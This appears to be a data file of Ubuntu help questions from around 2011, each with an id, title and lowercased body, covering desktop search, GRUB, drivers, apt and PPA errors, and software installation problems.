34127	is anyone aware of any progress made in packing updated versions of tracker ( desktop search tool ) ?	i understand that tracker is no longer installed by default on the ubuntu desktop . nevertheless , i really like having a desktop search tool . ( when i used to work with windows xp i thought that google desktop was a killer app ! ) . i recently upgraded to natty and reinstalled tracker . i noticed that the most updated version found in universe ( and on the tracker stable ppa ) is of version 0.8.17 , yet looking at the tracker website apparently the most updated version is 0.10 , and they are working on 0.11 . would love to know if we should expect updates and if work is being done for integration with unity . i would also love to know if there are any real alternatives to have a desktop search tool which cleanly integrates with unity ( which has become default with natty ) .
34128	what gaming resources for ubuntu ( or gnu/linux in general ) are there ?	what websites ( databases , news sites etc ) are available ? what repos are there ? include one resource per answer with a short description on the resource .
34138	how can i find/install a package that appears not to be available	i 'm trying to install the novell iprint client on ubuntu 10.10 , which comes as an rpm package and so needs to be installed via alien . one of its requirements to work properly seems to be a package called libglitz-glx1 . this package seems to be available for several distributions but not in the main repository for ubuntu 10.10 . the package does seem to be available for the 32 bit version of ubuntu but i 'm running 64 bit . is it possible to download and use the 32 bit version and rebuild it for 64 bit or is it not that simple ... simply put : how can i install libglitz-glx1 .
34139	upgrading from 10.10 to 11.04 ( package conflicts )	i 'm running 10.10 and have stayed within the repositories . when it is time to upgrade to 11.04 are there any `` programs '' in the 10.10 repository that are a potential conflict with 11.04 and should remove before `` upgrading ? ''
34144	how do i downgrade to a kernel version that i have previously uninstalled	i am running kernel version : 2.6.35-27-generic i want kernel version : 2.6.35-22-generic or 2.6.35-25-generic i have previously uninstalled both of the previous . a few scripts that i forgot to test ( and worked in old kernels ) no longer work in 35-27 i think .35-22 would be the best option
34145	can i define keyboard shortcuts using the super key ?	in 10.04 , i had a lot of keyboard shortcuts defined using super/mod4 and one single other key , super+o ran opera super+w opened nautilus pointing to my work folder , etc . in 11.04 , these do not seem to work -- only super+r works to run the terminal , and super+shift+w successfully runs nautilus . is there some way i can get these to function again ? adding them in keyboard shortcuts does not work , and neither does adding commands in compizconfig settings manager .
34147	touchpad keeps working while typing even after disabling the option in configuration	my problem is that touchpad in my samsung r580 keeps working while i 'm typing . i already disabled the option in the mouse configuration . if you need more info , just ask . thank you for any help !
34148	how can i set external monitor as default ?	i have connected an external monitor to my laptop through hdmi . currently either my desktop is getting extended to the external monitor ( with native resolution ) or low resolution on both when i choose `` same image in both '' . how can i ensure that the external monitor is used by default and the laptop monitor just blanks . i generated the xorg.conf file by doing : x -configure the following is the content of xorg.conf.new file generated in my user folder . should i copy this anywhere ? should i edit the contents ? section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' load `` dri2 '' load `` record '' load `` extmod '' load `` dbe '' load `` dri '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : : integer , : float , : `` true '' / '' false '' , # # # : `` string '' , : `` hz/khz/mhz '' , # # # : `` % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ ] # option `` swcursor '' # [ ] # option `` colorkey '' # # option `` cachelines '' # # option `` dac6bit '' # [ ] # option `` dri '' # [ ] # option `` noddc '' # [ ] # option `` showcache '' # [ ] # option `` xvmcsurfaces '' # # option `` pageflip '' # [ ] identifier `` card0 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
34156	change audio codec for bluetooth device	i 'm running maverick meerkat , and i have a aliph jawbone era for voip communications . i am using it to stream pandora for some musical goodness while i work , and the sound quality is just awful . is there a way to select/change/update the audio codec used to stream the signal to the headset for better sound quality ? thanks in advance
34158	how to monitor what files are opened	is there a tool to monitor what processes open what files on the system so you can track down which process keeps touching a specific file ? lsof can find out if you run it while the process has the file open , but if it is a short lived process that runs every once in a while , you ca n't catch it with lsof . need something that uses kernel tracing .
34159	show grub boot menu on 10.10 system	i 've checked some similar answers which suggest holding `` shift '' until the screen shows up , this does not work for me . i also tried restarting the system several times in a row and even powering off during the boot sequence , since grub is supposed to detect failures and show the boot screen after such an event , no luck ... i got into this mess because of changing my graphic card configuration and now the system will not even show the ubuntu log in screen . i know the grub boot menu is intact because immediately after the system failed to boot the first time , i restarted saw the menu and decided , to try to boot normally once more ... when in hind sight i would be fine if i 'd only chosen to start in safe graphics mode . i 've booted the system with a 10.10 installation disk and can get to any files but grub2 now required editing /etc/default/grub and then sudo update-grub but since i 'm running from cd/dvd i this is n't going to work right ... edit : i do n't yet understand the answer provided by psusi . if i say sudo chroot /media/661ae4bd-7dde-42c9-b944-f75cebeaa1ad sudo update-grub i get /usr/lib/grub/grub-mkconfig_lib : 38 : can not create /dev/null : permission denied /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) .
34164	xubuntu virtual screen resolution	i do n't know if what i 'm asking is possible . i 've installed xubuntu 10.10 on a gateway mx3225 ( old laptop ) . i could get the graphics the way i wanted on ubuntu 10.10 but not get audio , i can get audio on xubuntu 10.10 but the screen resolution is off . the visibility of the screen is good , but the area is much bigger than the actual display . the upper left is positioned correctly . but the right hand side is far off the screen as well is the bottom . after updates there are no other drivers for the display , none of the other listed graphic resolutions work ( cause corrupted display ) so i 'm wondering can i somehow leave the graphics configuration alone and somehow virtually map the ui into a smaller area ?
34167	installed wacom bamboo pen + touch drivers , but no dice	i 'm trying to install my new wacom bamboo pen + touch tablet in ubuntu 10.10 . as described here , among other places , i 've installed the wacom dkms package by doctormo and rebooted my pc , but the tablet does n't work . what works ? the lights on the tablet , and it shows up in lsbusb . what doesn't nothing else . there is no input . xsetwacom list devices gives emptiness . dmesg [ 444.340133 ] usb 7-2 : new full speed usb device using uhci_hcd and address 4 [ 444.512012 ] usb 7-2 : configuration # 1 chosen from 1 choice lsusb bus 007 device 004 : id 056a:00d6 wacom co. , ltd
34168	change tab color/shadow on nautilus elementary with elementary theme	i have a little question , there is a way to change the colour or shadow from tabs on nautilus elementary ? for example , i have two tabs opened , but i ca n't differentiate between both . i looked up the gtkrc file from this theme , and changed the color from the lines 288,289 , but this change the tab colors on others windows and not on nautilus
34170	add separator icon to quick launch panel	i would like to split categories of icons on my quick launch panel with separator . ca n't find it on panel properties or just add it . how can i do this ? ubuntu 10.10
34174	why is there no ubuntu one sync in my tomboy notes sync preferences ?	i started using tomboy on two other computers with 10.10 and 11.04 beta and am starting to like it . when i went to set up sync on my 10.04 box , i see that there is n't even an option to sync to ubuntu one . what do i need to do to get that option to show up in the sync preferences ?
34175	how to record skype video calls ?	http : //ubuntuforums.org/showthread.php ? t=939048 & page=3 so no xvidcap , vlc or screencast app like kazam ! ! !
34179	update manager can not open due to missing /var/lib/dpkg/status	update manger wo n't open saying e : could not open file/var/lib/dpkg/status - open ( 2 : no such file or directory ) , e : the package lists or status file could not be parsed or opened . what to do ?
34180	looking for a log thats bound to sudo	i 've issued the commands sudo su , and sudo sh . can you please tell me if there are logs associated with sudo , and where i could find them ?
34181	how to change the graphics driver from i915 to intel ?	does anyone know how to change the graphics driver in 11.04 from i915 to intel ?
34182	can i edit which icons appear in the unity dash ?	when i open the dash in 11.04 , i get two rows of icons . the first row contains 'lenses ' that take me to lists of applicaitons/files ; the second row opens specific applications - browse the web , view photos , check email , listen to music . is there any way to change what programs the icons in the second row point to ? ( if i were to add new lenses , do they also appear , and can i change the order ? ) so far it seems like the browse the web and listen to music icons respect my preferred applications choices . the first can be either firefox or chromium ( and perhaps others ) and the second can be either banshee or rhythmbox . however , i ca n't change the check email icon . it remains pinned to evolution , even though i have thunderbird set as my preferred email client . i 'd like to change this if i can .
34185	set default account in empathy metacontact	when i link contacts in empathy , facebook becomes the default account used in a new chat . is there a way to change the default account ? i 'd like to avoid using facebook whenever possible , and instead have different preferred accounts to use for different people .
34190	using upstart after building apache & mysql from source	i 'm using ubuntu 10.10 , apache 2.2.17 and mysql 5.5.10 . i need some assistance getting apache and mysql running on boot . reading the getting started over at upstart website attempting to get it to work . i added /etc/init/apache2.conf along with the following line : exec /usr/local/apache2/bin/apachectl i 'm probably doing everything wrong , could someone point me in the right direction ? thanks . : )
34191	backtrack 4 repository ?	i check to add backtrack 4 repository on my ubuntu lucid lynx 10.04 lts installation to add some tools that come with backtrack 4 easily ... various websites talk about it but none work ...
34200	what 2d/3d engines and game sdks are available ?	what 2d/3d engines and game development sdks are available that run natively on ubuntu ? please limit one engine/sdk per answer - and include why you enjoy the engine/sdk .
34201	how do i check the external hard disk i purchase would support ubuntu or other linux platforms	i planning to by a 1tb portable external hard disk . i have a budget of rs 6000 ( us $ 136 approx. ) . how do i check the external hard disk that i purchase would support operations for multiple os 's ( especially linux ) . for e.g . i referred to this offer from ebay : - http : //cgi.ebay.in/1tb-w-d-3-0-passport-external-portable-hard-disk-bill-/260763580999 ? pt=lh_defaultdomain_203 & hash=item3cb6b87a47 # ht_3869wt_1141 this and many similar offers never have any mention of whether or not they support linux os . i could see that they support mac os . i am planning to reserve around 450 gb for ubuntu and say remaining 450 for use with either windows 7/xp . would i be able to successfully implement this scenario ? can i boot ubuntu directly from this hard disk ? or if not , can this external hard disk be used as a mount point for more than machines which have the same version of ubuntu installed on it ( this would serve the purpose like a normal usb pen drive , right ? ) . in my case i specifically have a pc and a laptop both having ubuntu 10.04 os installed on it . the only diff is that the pc has win xp installed and the laptop has win 7 installed . can you please help me on this and suggest me on what features do i need to look in for when i would be purchasing an external hard disk and would want to use it for the above scenario . in any case if the above scenario ca n't be implemented , could you please suggest alternative best solutions which can be considered . thank you..
34205	how to compile and make ghc-6.2.2	in ubuntu i compile ghc-6.2.2 got the following error /usr/bin/ghc -m -optdep-f -optdep.depend -osuf o -h16m -o hasktags.hs on the commandline : warning : -optdep-f is deprecated : use -dep-makefile instead -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ==fptools== make boot - -- no-print-directory -r ; in /home/martin/ghc-6.2.2/ghc/utils/ghc-pkg -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- /usr/bin/ghc -m -optdep-f -optdep.depend -osuf o -h16m -o -cpp -dpkg_tool -dwant_pretty main.hs package.hs parsepkgconflite.hs version.hs on the commandline : warning : -optdep-f is deprecated : use -dep-makefile instead make all /usr/bin/ghc -h16m -o -cpp -dpkg_tool -dwant_pretty -c main.hs -o main.o -ohi main.hi main.hs:496:11 : ambiguous type variable `e ' in the constraint : `exception.exception e' arising from a use of `exception.throw ' at main.hs:496:11-25 possible cause : the monomorphism restriction applied to the following : my_catch : : forall a. io a - > ( e - > io a ) - > io a ( bound at main.hs:499:0 ) my_throw : : forall a. e - > a ( bound at main.hs:496:0 ) probable fix : give these definition ( s ) an explicit type signature or use -xnomonomorphismrestriction main.hs:498:13 : ambiguous type variable `e1 ' in the constraint : `exception.exception e1' arising from a use of `exception.catch ' at main.hs:498:13-27 possible cause : the monomorphism restriction applied to the following : eval_catch : : forall a. a - > ( e1 - > io a ) - > io a ( bound at main.hs:498:0 ) probable fix : give these definition ( s ) an explicit type signature or use -xnomonomorphismrestriction make [ 4 ] : *** [ main.o ] error 1 make [ 3 ] : *** [ boot ] error 2 make [ 2 ] : *** [ boot ] error 1 make [ 1 ] : *** [ boot ] error 1
34206	install mod_jk with apt-get	is it possible to install mod_jk via apt-get ? if yes , what is the name of the package ?
34207	run custom shell scripts on key press	i have created a shell script for a custom action which is working fine . i want to run this .sh file ( mon.sh ) on pressing alt+f15 . i have done the following : in gconf-editor , under apps > metacity > keybinding_commands , edited command_1 with value '' /home/administrator/my scripts/mon.sh '' ( tried without quotes also ) under apps > metacity > global_keybindings , edited run_command_1 with value < alt > f15 but the script is not getting executed when pressing alt+f15 what is that i am missing ?
34210	toggling language with alt+shift does n't work	on a recent install of 10.10 i ca n't toggle with alt+shift between usa/isr , even though i can toggle by pressing the language icon on the tool bar . any suggestions ? thanks
34214	how do i disable overlay scrollbars ?	it looks like ubuntu 11.04 will come with overlay scrollbars by default . i do like them , but i do n't like the current mix of scrollbar types as many applications do n't yet use those overlay scrollbars . is there a way to disable overlay scrollbars ( without removing the overlay-scrollbar package ) ?
34217	apt-get fail with `` unpacking replacement diff ''	i tried to install texmacs today by follow commond : sudo apt-get install texmacs but those message come up : preconfiguring packages ... ( reading database ... dpkg : warning : files list file for package `diff ' missing , assuming package has no files currently installed . ( reading database ... 212095 files and directories currently installed . ) preparing to replace diff 1:2.8.1-18 ( using ... /diff_1 % 3a2.8.1-18_all.deb ) ... unpacking replacement diff ... i have no idea why my computer stop at here . i try to install other software but same message will come . how to solve it ? then i type following : sudo rm /var/lib/dpkg/lock sudo rm /var/cache/apt/archives/lock sudo mv /var/cache/apt/archives/diff_1 % 3a2.8.1-18_all.deb /var/tmp sudo dpkg -- configure -a sudo apt-get clean sudo apt-get install texmacs seems not work : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : python-wxgtk2.8 ttf-symbol-replacement wine1.2-gecko cabextract ttf-mscorefonts-installer nvidia-settings python-wxversion use 'apt-get autoremove ' to remove them . the following extra packages will be installed : diff iamerican ispell libjpeg-progs librsvg2-bin libtiff-tools texlive-math-extra texmacs-common texmacs-extra-fonts transfig xaw3dg xfig xfig-libs suggested packages : spell libtiff-opengl xfig-doc the following new packages will be installed : iamerican ispell libjpeg-progs librsvg2-bin libtiff-tools texlive-math-extra texmacs texmacs-common texmacs-extra-fonts transfig xaw3dg xfig xfig-libs the following packages will be upgraded : diff 1 upgraded , 13 newly installed , 0 to remove and 73 not upgraded . 1 not fully installed or removed . need to get 22.8mb of archives . after this operation , 70.3mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //security.ubuntu.com/ubuntu/ lucid-security/main libtiff-tools 3.9.2-2ubuntu0.6 [ 252kb ] get:2 http : //archive.ubuntu.com/ubuntu/ lucid/universe diff 1:2.8.1-18 [ 5,868b ] get:3 http : //archive.ubuntu.com/ubuntu/ lucid/main ispell 3.1.20.0-7 [ 175kb ] get:4 http : //archive.ubuntu.com/ubuntu/ lucid/main iamerican 3.1.20.0-7 [ 445kb ] get:5 http : //archive.ubuntu.com/ubuntu/ lucid/main libjpeg-progs 7+really6b-15ubuntu1 [ 83.8kb ] get:6 http : //archive.ubuntu.com/ubuntu/ lucid-updates/universe librsvg2-bin 2.26.3-0ubuntu1 [ 23.2kb ] get:7 http : //archive.ubuntu.com/ubuntu/ lucid/main texlive-math-extra 2009-7ubuntu3 [ 7,121kb ] get:8 http : //archive.ubuntu.com/ubuntu/ lucid/universe texmacs-common 1:1.0.7.3-3 [ 3,879kb ] get:9 http : //archive.ubuntu.com/ubuntu/ lucid/universe texmacs 1:1.0.7.3-3 [ 1,944kb ] get:10 http : //archive.ubuntu.com/ubuntu/ lucid/universe texmacs-extra-fonts 0.2 [ 5,674kb ] get:11 http : //archive.ubuntu.com/ubuntu/ lucid/main transfig 1:3.2.5.a-2.1 [ 608kb ] get:12 http : //archive.ubuntu.com/ubuntu/ lucid/main xaw3dg 1.5+e-17build1 [ 176kb ] get:13 http : //archive.ubuntu.com/ubuntu/ lucid/universe xfig 1:3.2.5.b-1ubuntu1 [ 748kb ] get:14 http : //archive.ubuntu.com/ubuntu/ lucid/universe xfig-libs 1:3.2.5.b-1ubuntu1 [ 1,679kb ] fetched 22.8mb in 1min 2s ( 366kb/s ) preconfiguring packages ... ( reading database ... dpkg : warning : files list file for package `diff ' missing , assuming package has no files currently installed . ( reading database ... 212095 files and directories currently installed . ) preparing to replace diff 1:2.8.1-18 ( using ... /diff_1 % 3a2.8.1-18_all.deb ) ... unpacking replacement diff ... why i should upgrade diff package ?
34219	how do i autosuspend a usb device ?	i am trying to follow the instructions on lesswatts , to enable usb autosuspend . when i run powertop , it says , that i have a device ( usb device 2-6 : 2.4g multimedia wireless kit ( chicony ) ) that is running 100 % of the time . i do n't use the wifi and indeed i 've blacklisted the wifi driver , so i am pretty confident i do n't need this device . so i set the idle timeout to 2 seconds and echo auto > /sys/bus/usb/devices/2-6/power/level works , but the device is still active . if i try echo suspend > /sys/bus/usb/devices/2-6/power/level then the bash prompt skips ten lines and stops , but the contents of the file is still auto
34225	searching ppa for recent versions of git and cmake	i am searching for two ppas for a lucid server . one for git , i found git stable releases for git , is this correct ? i did not find any ppas for cmake and need support for that .
34226	is there a daily/alpha/beta bug report applet/widget ?	i 'm looking for an applet on daily/alpha/beta builds on the bar that you could click and then click on an application that 's causing issues and then write your report . it would make life so much easier , and also allow many new users to have a nicer bug reporting experience . it would also be nice if the same applet/widget click just be used to also just start up a blank bug report window too . that , or something like the `` feedback '' button found in firefox , but globally available for the distro . or something like what microsoft do with their beta applications , with a button in the taskbar or in the top of the application window .
34227	how to download html5 videos ?	how do i download html5 videos in ubuntu ?
34229	how can i make networkmanager assign specific addresses and names to machines that connect via `` shared to other computers '' ?	it appears as if , in ubuntu 10.10 , networkmanger uses dnsmasq to implement the `` shared to other computers '' method . this is work fairly well for me , but i want the machines that connect to get specific ips and names . i would have thought this would be as simple as creating the /etc/dnsmasq.conf file with a bunch of dhcp-host lines in it , but networkmanager seems to be using a custom configuration ( /tmp/randomfilename.conf ) instead of the one in /etc . is there some way to edit the config file networkmanger uses , or is there some way in the gui to do what i want ?
34231	after paying for my music ubuntu-one-music-store tells me my network is down , yet it 's not !	after paying with paypal in `` ubuntu one music-store '' it returns this message : internet connection is required to access the music store please connect and reload . then when i press reload it returns the same message . when i check into my ubuntu one account on the web i do n't see my purchased music . what to do ?
34234	can windows 7 ultimate and ubuntu 10.10 work together as a dual boot system ?	can windows 7 ultimate and ubuntu 10.10 work as a dual boot system ? if so then how ? if we can do it please give me the answer as fast as you can .
34238	spotify under wine	i am running spotify under wine . however , it keeps getting interrupted now and then , and i have to restart spotify . ( i am running ubuntu 10.10 and wine 1.2.2 ) . how is this fixed ? i have tried switching from the alsa driver to the oss driver in the wine configurations , but then i get a message that there is no sound card found . are there any others options ? i forgot to add ; i only have a regular spotify account , therefore i can not use spotify for linux .
34245	domain name is n't assigned from dhcp when booting from live cd	i downloaded the ubuntu 10.10 iso image for amd64 . when i start the iso ubuntu gets an ip address from my dhcp server . networkmanager updates /etc/resolv.conf according to the dns config provided by dhcp . but nm does not apply the domain name to /etc/hosts . when i do 'hostname -f ' i simple get 'ubuntu ' , but it should be 'ubuntu.mydomain.com ' . any ideas what 's wrong here ? is it my dhcp server or is it some missing config in ubuntu ?
34252	bbc iplayer error `` a problem occurred while downloading this programme ''	i 'm using bbc iplayer desktop v.3.0.10 with adobe air v.2.6.0 on ubuntu 11.04 'natty narwhal ' beta 1 86x on a dell inspiron 1525 no matter what programme i attempt to download i will get the message `` a problem occurred while downloading this programme . '' i thought i had fixed the problem when i followed the instructions on the below link under the `` troubleshooting gnomekeyring '' section however this does n't stick after logging out http : //kb2.adobe.com/cps/492/cpsid_49267.html so any ideas ? i 've asked on the official iplayer message board 's and have also emailed the bbc and tweeted to them but as of yet have n't heard anything back about the problem . here 's a copy of the `` iplayer.log '' file : http : //pastebin.com/0h4s6r0x
34255	gnome shell theme / decorations broken	i 've upgraded to 11.04 and replaced unity with gnome shell . now the controls and window decorations look like if there was `` no theme '' . i have an ati hd 3470 and i do n't use proprietary drivers ( fglrx ) . what should i do to get the nice default gnome shell theme ? screenshot : http : //imagebin.org/147358
34256	apt 404 error when when updating with a ppa	sudo apt-get update command always gives me errors . it 's been days since my package lists have been updated . can anyone help me to correct it ? here is the screenshot : edit : here are the commands and their ouputs : command : cat /etc/apt/sources.list | grep -e ^ [ ^ # ] output : deb-src http : //ubuntu.oss.eznetsols.org/ubuntu/ maverick main restricted # added by software-properties deb http : //ubuntu.oss.eznetsols.org/ubuntu/ maverick main restricted multiverse deb-src http : //ubuntu.oss.eznetsols.org/ubuntu/ maverick universe # added by software-properties deb http : //ubuntu.oss.eznetsols.org/ubuntu/ maverick-updates main restricted multiverse deb-src http : //ubuntu.oss.eznetsols.org/ubuntu/ maverick-updates restricted main universe # added by software-properties deb http : //ubuntu.oss.eznetsols.org/ubuntu/ maverick universe deb http : //ubuntu.oss.eznetsols.org/ubuntu/ maverick-updates universe deb http : //archive.canonical.com/ubuntu maverick partner deb-src http : //archive.canonical.com/ubuntu maverick partner deb http : //extras.ubuntu.com/ubuntu maverick main deb-src http : //extras.ubuntu.com/ubuntu maverick main deb http : //ubuntu.oss.eznetsols.org/ubuntu/ maverick-security main restricted multiverse deb-src http : //ubuntu.oss.eznetsols.org/ubuntu/ maverick-security restricted main universe # added by software-properties deb http : //ubuntu.oss.eznetsols.org/ubuntu/ maverick-security universe deb http : //deb.torproject.org/torproject.org lucid main deb-src http : //deb.torproject.org/torproject.org lucid main deb http : //deb.torproject.org/torproject.org lucid main deb-src http : //deb.torproject.org/torproject.org lucid main deb http : //ppa.launchpad.net/jcfp/ppa/ubuntu maverick main command : cat /etc/apt/sources.list.d/* | grep -e ^ [ ^ # ] output : deb http : //ppa.launchpad.net/banshee-team/ppa/ubuntu maverick main deb-src http : //ppa.launchpad.net/banshee-team/ppa/ubuntu maverick main deb http : //ppa.launchpad.net/banshee-team/ppa/ubuntu maverick main deb-src http : //ppa.launchpad.net/banshee-team/ppa/ubuntu maverick main deb http : //apt.boxee.tv/ maverick main deb http : //apt.boxee.tv/ maverick main deb http : //ppa.launchpad.net/cardapio-team/unstable/ubuntu maverick main deb-src http : //ppa.launchpad.net/cardapio-team/unstable/ubuntu maverick main deb http : //ppa.launchpad.net/cardapio-team/unstable/ubuntu maverick main deb-src http : //ppa.launchpad.net/cardapio-team/unstable/ubuntu maverick main deb http : //linux.dropbox.com/ubuntu maverick main deb http : //linux.dropbox.com/ubuntu maverick main deb http : //dl.google.com/linux/chrome/deb/ stable main deb http : //dl.google.com/linux/chrome/deb/ stable main deb http : //dl.google.com/linux/talkplugin/deb/ stable main deb http : //dl.google.com/linux/talkplugin/deb/ stable main deb http : //ppa.launchpad.net/jd-team/jdownloader/ubuntu maverick main deb-src http : //ppa.launchpad.net/jd-team/jdownloader/ubuntu maverick main deb http : //ppa.launchpad.net/jd-team/jdownloader/ubuntu maverick main deb-src http : //ppa.launchpad.net/jd-team/jdownloader/ubuntu maverick main deb http : //ppa.launchpad.net/kilian/f.lux/ubuntu maverick main deb-src http : //ppa.launchpad.net/kilian/f.lux/ubuntu maverick main deb http : //ppa.launchpad.net/kilian/f.lux/ubuntu maverick main deb-src http : //ppa.launchpad.net/kilian/f.lux/ubuntu maverick main deb http : //ppa.launchpad.net/libreoffice/ppa/ubuntu maverick main deb-src http : //ppa.launchpad.net/libreoffice/ppa/ubuntu maverick main deb http : //ppa.launchpad.net/libreoffice/ppa/ubuntu maverick main deb-src http : //ppa.launchpad.net/libreoffice/ppa/ubuntu maverick main deb http : //ppa.launchpad.net/mozillateam/firefox-stable/ubuntu maverick main deb-src http : //ppa.launchpad.net/mozillateam/firefox-stable/ubuntu maverick main deb http : //ppa.launchpad.net/mozillateam/firefox-stable/ubuntu maverick main deb-src http : //ppa.launchpad.net/mozillateam/firefox-stable/ubuntu maverick main deb http : //ppa.launchpad.net/mystilleef/scribes-daily/ubuntu maverick main deb-src http : //ppa.launchpad.net/mystilleef/scribes-daily/ubuntu maverick main deb http : //ppa.launchpad.net/mystilleef/scribes-daily/ubuntu maverick main deb-src http : //ppa.launchpad.net/mystilleef/scribes-daily/ubuntu maverick main deb http : //ppa.launchpad.net/openoffice-pkgs/ppa/ubuntu maverick main deb-src http : //ppa.launchpad.net/openoffice-pkgs/ppa/ubuntu maverick main deb http : //ppa.launchpad.net/openoffice-pkgs/ppa/ubuntu maverick main deb-src http : //ppa.launchpad.net/openoffice-pkgs/ppa/ubuntu maverick main deb http : //ppa.launchpad.net/openoffice-pkgs/pp/ubuntu maverick main deb-src http : //ppa.launchpad.net/openoffice-pkgs/pp/ubuntu maverick main deb http : //ppa.launchpad.net/openoffice-pkgs/pp/ubuntu maverick main deb-src http : //ppa.launchpad.net/openoffice-pkgs/pp/ubuntu maverick main deb http : //deb.opera.com/opera/ stable non-free # opera browser ( final releases ) deb http : //deb.opera.com/opera/ stable non-free # opera browser ( final releases ) deb http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu maverick main deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu maverick main deb http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu maverick main deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu maverick main deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu maverick main # ubuntu tweak stable source deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu maverick main # ubuntu tweak stable source deb http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu maverick main deb-src http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu maverick main deb http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu maverick main deb-src http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu maverick main deb http : //winff.org/ubuntu maverick universe
34259	can the hostname changed via dhcp ?	according to several comments in the web most dhcp clients simply ignore the hostname provided by the dhcp server . does ubuntu use the provided hostname ? if not , how can ubuntu be persuaded to use the provided hostname ?
34260	why do i get a `` the location is not a folder '' error when trying to open files using dash or synapse ?	within the last few days , i 've encountered errors when trying to open files using unity dash , synapse , or even the gnome search tool . these methods will let me launch applications and folders , but not files of any time , including mp3 , doc , odt , and txt . with any method , the same error dialogue results : `` the location is not a folder '' . is there something i can do on my end to correct this , or is this a bug in natty that is still being corrected ?
34261	how do i disable vsync in ccsm and catalyst control center ?	how do i disable vsync in compiz-config settings manager and catalyst control center ?
34265	wubi installation on laptop keeps becoming unresponsive	i have wubi on my asus eee laptop . usually after locking the screen then unlocking it , it becomes sort of unresponsive in a weird way . i can click on the background and drag and draw a square but i can not click any buttons , no menus , i ca n't even restart . the only application that i am consistently running on it is google chrome . any idea what is going on ?
34267	gedit is n't picking up new plugins	hi i have tried to install this plugin for gedit by copying the files auto_completion.gedit-plugin auto_completion.py to /usr/share/gedit-2/plugins/autocomplete however when i restart gedit and go to edit - > preferences this plugin is not listed . am i missing a step ? is there a way to tell gedit to look for new plugins ?
34268	will ubuntu 11.10 uses gnome 3 apps with unity interface ?	apps as nautilus , system settings , etc ...
34276	will ubuntu use lzm2 or xz compression to save space on the cd ?	when ubuntu will use lzma2 compression by default to save cd space . opensuse 11.4 is doing it by default .
34278	how do i mount a motorola xoom so i can sync music ?	how do you mount a motorola xoom in ubuntu to sync your music ? i recently purchased one , and unlike my other android devices , it does n't seem to want to mount . i tried using a windows computer to sync the music but the services are n't as well refined as what we see in banshee ( especially with metadata and album art ) .
34279	does gnome tweak tool work with gnome shell built from git ?	i 'd like to try gnome shell on ubuntu 10.10 again , after having discarded it due to the waste of space the non-configurable fonts were causing ( i 'm using a netbook ) . i read about gnome tweak tool so i wondered if i could use it to customize the shell interface . any help appreciated .
34283	ca n't install scribus 1.4	i want to use the new version of scribus on my ubuntu laptop after finding it very easy to install on my old macbook . i 've added this to my software sources : ubuntu maverick meerkat ( maverick or 10.10 ) : deb http : //debian.scribus.net/debian/ maverick main deb http : //debian.tagancha.org/debian/ maverick main as recommended here : http : //wiki.scribus.net/canvas/debian # ubuntu_maverick_meerkat_.28maverick_or_10.10.29 : when i try and install it , it does this : me @ me-laptop : ~ $ sudo aptitude install scribus-ng [ sudo ] password for me : reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done writing extended state information ... done the following packages are broken : scribus-ng the following new packages will be installed : blt { a } icc-profiles { a } libpodofo0.9.0 { a } python-tk { a } tcl8.5 { a } tk8.5 { a } the following packages will be removed : bsd-mailx { u } 0 packages upgraded , 7 newly installed , 1 to remove and 73 not upgraded . need to get 50.6mb of archives . after unpacking 98.2mb will be used . the following packages have unmet dependencies : scribus-ng : depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but 4:4.6.2-0ubuntu5.1 is installed and it is kept back . the following actions will resolve these dependencies : keep the following packages at their current version : scribus-ng [ not installed ] score is -9881 accept this solution ? [ y/n/q/ ? ] y the following packages will be removed : bsd-mailx { u } 0 packages upgraded , 0 newly installed , 1 to remove and 73 not upgraded . need to get 0b of archives . after unpacking 299kb will be freed . do you want to continue ? [ y/n/ ? ] y writing extended state information ... done ( reading database ... 218429 files and directories currently installed . ) removing bsd-mailx ... processing triggers for doc-base ... processing 1 removed doc-base file ( s ) ... registering documents with scrollkeeper ... processing triggers for man-db ... reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package 